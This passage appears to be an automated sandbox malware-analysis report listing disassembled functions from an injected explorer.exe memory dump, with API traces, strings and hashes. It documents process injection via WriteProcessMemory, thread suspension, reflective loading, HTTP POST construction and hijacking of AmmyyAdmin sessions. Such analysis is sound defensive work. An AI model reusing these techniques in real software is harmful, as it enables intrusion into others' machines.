                              • Part of subcall function 00571912: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 0057194C
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 005723D2
                            • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 005723E5
                            • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 005723FE
                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00572411
                            • Sleep.KERNEL32(000001F4), ref: 0057242E
                            • RtlExitUserThread.NTDLL(00000000), ref: 00572445
                            • ExitProcess.KERNEL32 ref: 0057244D
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: AddressProc$LibraryLoad$CurrentExitProcessThread$CloseCreateFirstHandleMemoryMoveSleepSnapshotThread32Toolhelp32User
                            • String ID: CreateFileW$MessageBoxA$MessageBoxW$MoveFileW$ShowWindow$SystemParametersInfoW$advapi32.dll$kernel32.dll$user32.dll
                            • API String ID: 408137310-2290992051
                            • Opcode ID: f730646c9f3c9e44763f6fd247eabcc8d488ca5a270c446df270b0ceefe96821
                            • Instruction ID: 9a6696823a786ab4ff448666ccd8dde1f2fa8a527a032e4ecf832e3c44f2cf7b
                            • Opcode Fuzzy Hash: f730646c9f3c9e44763f6fd247eabcc8d488ca5a270c446df270b0ceefe96821
                            • Instruction Fuzzy Hash: DD11A234780A21A7CA1133793C5EF6E2D92BBD4B01F50C414B20DA71E2DFA4CC867A29
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00572340 Relevance: 36.8, APIs: 12, Strings: 9, Instructions: 76libraryloadersleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00571276: GetCurrentProcessId.KERNEL32 ref: 00571288
                              • Part of subcall function 00571276: GetCurrentThreadId.KERNEL32 ref: 00571290
                              • Part of subcall function 00571276: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 005712A0
                              • Part of subcall function 00571276: Thread32First.KERNEL32(00000000,0000001C), ref: 005712AE
                              • Part of subcall function 00571276: CloseHandle.KERNEL32(00000000), ref: 00571307
                            • LoadLibraryA.KERNEL32(user32.dll), ref: 0057235B
                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0057238D
                            • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 005723A6
                            • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 005723BF
                            • GetProcAddress.KERNEL32(00000000,SystemParametersInfoW), ref: 00572374
                              • Part of subcall function 00571912: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 0057194C
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 005723D2
                            • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 005723E5
                            • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 005723FE
                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00572411
                            • Sleep.KERNEL32(000001F4), ref: 0057242E
                            • RtlExitUserThread.NTDLL(00000000), ref: 00572445
                            • ExitProcess.KERNEL32 ref: 0057244D
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: AddressProc$LibraryLoad$CurrentExitProcessThread$CloseCreateFirstHandleMemoryMoveSleepSnapshotThread32Toolhelp32User
                            • String ID: CreateFileW$MessageBoxA$MessageBoxW$MoveFileW$ShowWindow$SystemParametersInfoW$advapi32.dll$kernel32.dll$user32.dll
                            • API String ID: 408137310-2290992051
                            • Opcode ID: 9f1375706ea8a561147553eae5c40fc63c1665e6441864b2802342ab18957e68
                            • Instruction ID: d03dbe9af45351d80f784a6c38355654bbc8a2a8bee4ded162f5d67c24158e4d
                            • Opcode Fuzzy Hash: 9f1375706ea8a561147553eae5c40fc63c1665e6441864b2802342ab18957e68
                            • Instruction Fuzzy Hash: 83118435780B11A7CB1133B93C5EB2E5D92BBD4B01F51C424B20DA75E3DFA4C8867A29
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00571276 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetCurrentProcessId.KERNEL32 ref: 00571288
                            • GetCurrentThreadId.KERNEL32 ref: 00571290
                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 005712A0
                            • Thread32First.KERNEL32(00000000,0000001C), ref: 005712AE
                            • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 005712CD
                            • SuspendThread.KERNEL32(00000000), ref: 005712DD
                            • CloseHandle.KERNEL32(00000000), ref: 005712EC
                            • Thread32Next.KERNEL32(00000000,0000001C), ref: 005712FC
                            • CloseHandle.KERNEL32(00000000), ref: 00571307
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                            • String ID:
                            • API String ID: 1467098526-0
                            • Opcode ID: ed32e99c97216fdbaa5262047cf9a921b660b1a54fe4efdc7ed785f5f2dffb72
                            • Instruction ID: 4a7e5cb1b5693e89e18a83b9dbfab6721d2ac9cc6138de8d6be0ef7c08be3473
                            • Opcode Fuzzy Hash: ed32e99c97216fdbaa5262047cf9a921b660b1a54fe4efdc7ed785f5f2dffb72
                            • Instruction Fuzzy Hash: 75117C72409200EFD7119FA6BC0CA6F7EA8FB95701F054519F64AD6110D730898DBFAB
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 005714B0 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 282COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 620 5714b0-57150c call 571483 call 571000 call 57106c call 571364 629 571527-571533 620->629 630 57150e-571525 620->630 633 571537-571539 629->633 630->633 634 57153f-571575 RtlZeroMemory 633->634 635 571809-571819 call 571011 633->635 639 571802 634->639 640 57157b-571596 634->640 639->635 641 5715c8-5715da 640->641 642 571598-5715a9 call 5713f4 640->642 648 5715de-5715e0 641->648 646 5715bc 642->646 647 5715ab-5715ba 642->647 649 5715be-5715c6 646->649 647->649 650 5715e6-571646 call 571090 648->650 651 5717ef-5717f5 648->651 649->648 659 57164c-571651 650->659 660 5717e8 650->660 653 5717f7-5717f9 call 571011 651->653 654 5717fe 651->654 653->654 654->639 661 571653-571664 659->661 662 57166b-571699 call 571000 wsprintfW 659->662 660->651 661->662 665 5716b2-5716cb 662->665 666 57169b-57169d 662->666 672 5716cd-571703 call 571000 wsprintfW 665->672 673 57170a-571724 665->673 667 57169e-5716a1 666->667 668 5716a3-5716a8 667->668 669 5716ac-5716ae 667->669 668->667 671 5716aa 668->671 669->665 671->665 672->673 677 57172a-57173d 673->677 678 5717c9-5717db call 571011 673->678 677->678 681 571743-571751 call 571000 677->681 685 5717e4 678->685 686 5717dd-5717df call 571011 678->686 689 571753-57175e 681->689 685->660 686->685 690 571772-571789 689->690 691 571760-57176d call 57102f 689->691 695 57178d-57179a 690->695 696 57178b 690->696 691->690 695->689 697 57179c-5717a4 695->697 696->695 698 5717a6 697->698 699 5717be-5717c5 call 571011 697->699 700 5717a6 call 57104c 698->700 699->678 702 5717ab-5717b8 RtlMoveMemory 700->702 702->699
                            APIs
                              • Part of subcall function 00571000: GetProcessHeap.KERNEL32(00000008,?,0057134A,?,00000000,00000001,00000000,?), ref: 00571003
                              • Part of subcall function 00571000: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0057100A
                              • Part of subcall function 0057106C: lstrlen.KERNEL32(?,00000000,00000000,00000000,005714ED,00000000,772D81D0,?,?), ref: 00571074
                              • Part of subcall function 0057106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00571086
                              • Part of subcall function 00571364: RtlZeroMemory.NTDLL(?,00000018), ref: 00571377
                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 00571548
                            • wsprintfW.USER32 ref: 00571685
                            • wsprintfW.USER32 ref: 005716F2
                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 005717B8
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                            • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                            • API String ID: 4204651544-1701262698
                            • Opcode ID: 9149e16273f4f889f393538da028c817a61daf039e5df65c9de16bf41d5743fa
                            • Instruction ID: 9436fe23584b88d473c9c736c8fda10909cbb8abc610782d8e2affc4fc58e42e
                            • Opcode Fuzzy Hash: 9149e16273f4f889f393538da028c817a61daf039e5df65c9de16bf41d5743fa
                            • Instruction Fuzzy Hash: C0A19E71608745AFD314AF68E848A2BBBE9FB98740F00892DF589C7251DB30DD84EF56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0057201D Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73injectionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 704 57201d-5720cf WriteProcessMemory * 7
                            APIs
                            • WriteProcessMemory.KERNEL32(?,0040889C,?,00000001,00000000), ref: 00572043
                            • WriteProcessMemory.KERNEL32(?,004579F0,?,00000001,00000000), ref: 00572057
                            • WriteProcessMemory.KERNEL32(?,0044A2C2,?,00000001,00000000), ref: 0057206B
                            • WriteProcessMemory.KERNEL32(?,00449F61,?), ref: 00572087
                            • WriteProcessMemory.KERNEL32(?,00449F86,?,00000002,00000000), ref: 0057209E
                            • WriteProcessMemory.KERNEL32(?,0045CE34,00000003,00000001,00000000), ref: 005720B2
                            • WriteProcessMemory.KERNEL32(?,00451F52,?,00000001,00000000), ref: 005720C6
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID: t
                            • API String ID: 3559483778-2238339752
                            • Opcode ID: 6f05d1c89c13c50b6634f57e668d4be329e136677e76101e81e3413fdee5d7b3
                            • Instruction ID: 66e4f7ed48f7207f2cd16916ddb1af4bb4e471b576ba5418abc95766df8d878d
                            • Opcode Fuzzy Hash: 6f05d1c89c13c50b6634f57e668d4be329e136677e76101e81e3413fdee5d7b3
                            • Instruction Fuzzy Hash: 5711266014C3497BD211DA1A8C84D7FBFECEBC2A64F400A5FF9C4A21C1D758A90D8AB7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00571F96 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 48threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 705 571f96-571faa FindWindowA 706 571fac-571fcd call 571000 GetDlgItemTextA 705->706 707 57201a-57201c 705->707 710 572010-572014 706->710 711 571fcf-571fd8 call 571f5c 706->711 710->707 711->710 714 571fda-572006 wsprintfA CreateThread CloseHandle 711->714 714->710
                            APIs
                            • FindWindowA.USER32(AmmyyAdmin3Main,00000000), ref: 00571FA0
                              • Part of subcall function 00571000: GetProcessHeap.KERNEL32(00000008,?,0057134A,?,00000000,00000001,00000000,?), ref: 00571003
                              • Part of subcall function 00571000: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0057100A
                            • GetDlgItemTextA.USER32(00000000,000005E7,00000000,00000104), ref: 00571FC5
                              • Part of subcall function 00571F5C: lstrlen.KERNEL32 ref: 00571F66
                              • Part of subcall function 00571F5C: lstrlen.KERNEL32 ref: 00571F81
                            • wsprintfA.USER32 ref: 00571FE6
                            • CreateThread.KERNEL32(?,?,Function_00000F0F,00576070), ref: 00571FF9
                            • CloseHandle.KERNEL32(00000000,?,?,Function_00000F0F,00576070), ref: 00572000
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: Heaplstrlen$AllocateCloseCreateFindHandleItemProcessTextThreadWindowwsprintf
                            • String ID: %s{:!:}-$AmmyyAdmin3Main$p`W
                            • API String ID: 4071220498-79966700
                            • Opcode ID: c7073e5a0487f295ac873e0d4d4e7cc39a002db8eb6331926f64ff0acb2dfd37
                            • Instruction ID: 674d15f839869a9ed5683b26c0e9da72dd616488c3b8d6f645789d78b2792757
                            • Opcode Fuzzy Hash: c7073e5a0487f295ac873e0d4d4e7cc39a002db8eb6331926f64ff0acb2dfd37
                            • Instruction Fuzzy Hash: D8F08CB1300600ABE7202B657C8CF3F2E1DFBA1B96B104028FA4E96181CB608C85FA75
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00571B56 Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • RtlMoveMemory.NTDLL(?,?,?), ref: 00571B8D
                            • LoadLibraryA.KERNEL32(?,005760DC,00000000,00000000,772EF560,00000000,00571DC3,?), ref: 00571BB5
                            • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00571BE2
                            • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00571C33
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                            • String ID:
                            • API String ID: 3827878703-0
                            • Opcode ID: f8b5d8393d1cc4663b36d69edc51984a62dd93ac1d3eae081b319af2bcdb316c
                            • Instruction ID: 84884fb045b47da6e0c7aaa86dbc91d49eeef474a9c1c3a3aaf8ecd38deb0c7d
                            • Opcode Fuzzy Hash: f8b5d8393d1cc4663b36d69edc51984a62dd93ac1d3eae081b319af2bcdb316c
                            • Instruction Fuzzy Hash: 1331A271200A169BCB18CF6DEC84B66BBA8BF15355B14852CE84ECB200E725EC45EBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 005720F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00571000: GetProcessHeap.KERNEL32(00000008,?,0057134A,?,00000000,00000001,00000000,?), ref: 00571003
                              • Part of subcall function 00571000: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0057100A
                            • GetClassNameA.USER32(?,00000000,00000103), ref: 0057210A
                            • lstrcmpi.KERNEL32(00000000,AmmyyAdmin3SessionsList), ref: 00572116
                            Strings
                            • AmmyyAdmin3SessionsList, xrefs: 00572110
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: Heap$AllocateClassNameProcesslstrcmpi
                            • String ID: AmmyyAdmin3SessionsList
                            • API String ID: 3120313154-4023854077
                            • Opcode ID: 9b02448b1a524ebf812d6f5d3ecfbea541f71eaa140c7e1959c15fb7bf680f9f
                            • Instruction ID: 16910c0a123eaad7cbddb242667ae3ee1046b70b197843a49502dac08fa8f1a3
                            • Opcode Fuzzy Hash: 9b02448b1a524ebf812d6f5d3ecfbea541f71eaa140c7e1959c15fb7bf680f9f
                            • Instruction Fuzzy Hash: 08F0E531204621ABC7016B36BC0CA6F7EAAFFD0391F004428F24DC1160DB604C99BB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00571238 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26threadCOMMON
                            Download Yara Rule
                            APIs
                            • FindWindowA.USER32(AmmyyAdmin3Main,00000000), ref: 00571246
                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00571259
                              • Part of subcall function 00571214: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,0057126B), ref: 0057121A
                              • Part of subcall function 00571214: TerminateProcess.KERNEL32(00000000,00000000), ref: 00571229
                              • Part of subcall function 00571214: CloseHandle.KERNEL32(00000000), ref: 00571230
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.507841568.0000000000571000.00000040.80000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_571000_explorer.jbxd
                            Similarity
                            • API ID: Process$Window$CloseFindHandleOpenTerminateThread
                            • String ID: AmmyyAdmin3Main
                            • API String ID: 1658191309-632365155
                            • Opcode ID: 4752a9f8d9583e58a53b82100cada7cc50702afa210ea606ae5541ef182aaa0a
                            • Instruction ID: 412697bb2558417990b2ae0c00c38ddc89b29c89fc580b5858732423fc984024
                            • Opcode Fuzzy Hash: 4752a9f8d9583e58a53b82100cada7cc50702afa210ea606ae5541ef182aaa0a
                            • Instruction Fuzzy Hash: 6DE0D839A10614ABDB24EB9AFC09BBE7B2CFB10711F004048E90DD20419B605D40F6E5
                            Uniqueness

                            Uniqueness Score: -1.00%